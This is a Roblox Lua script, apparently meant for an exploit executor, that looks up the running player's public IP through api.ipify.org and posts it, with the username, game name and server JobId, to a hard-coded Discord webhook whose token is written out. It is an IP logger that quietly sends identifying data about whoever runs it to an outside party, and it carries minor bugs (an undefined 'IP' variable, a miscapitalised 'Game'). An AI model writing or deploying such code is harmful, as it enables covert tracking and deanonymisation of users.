local player_ip = game:HttpGet("https://api.ipify.org/", true)

local OSTime = os.time();
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local Time = os.date('!*t', OSTime);
local Avatar = 'https://cdn.discordapp.com/embed/avatars/4.png';
local Content = '****------------------------EXECUTED------------------------****';
local Embed = {
    title = "**" .. GetName.Name .. "**";
    color = '65280';
	description = 'Name - '..'****'..game.Players.LocalPlayer.Name..'****'..' '..'IP - '..' '..'****'..IP..'****'..' '..'Status - '..'****'..'Idrk'..'****',
    footer = { text = game.JobId };
    author = {
        name = 'Game Link';
        url = 'https://www.roblox.com/games/'..Game.PlaceId..'/';
    };
    fields = {};
    timestamp = string.format('%d-%d-%dT%02d:%02d:%02dZ', Time.year, Time.month, Time.day, Time.hour, Time.min, Time.sec);
};
(syn and syn.request or http_request) {
    Url = 'https://discordapp.com/api/webhooks/680805071260352537/MiHQ5cnHcnLlg_JOC1qzb8BZ0zAI1In2gsCzJod2pbke9bT2W7uCmGDS-LxWu6CIMIRN';
    Method = 'POST';
    Headers = {
        ['Content-Type'] = 'application/json';
    };
    Body = game:GetService'HttpService':JSONEncode( { content = Content; embeds = { Embed } } );
};
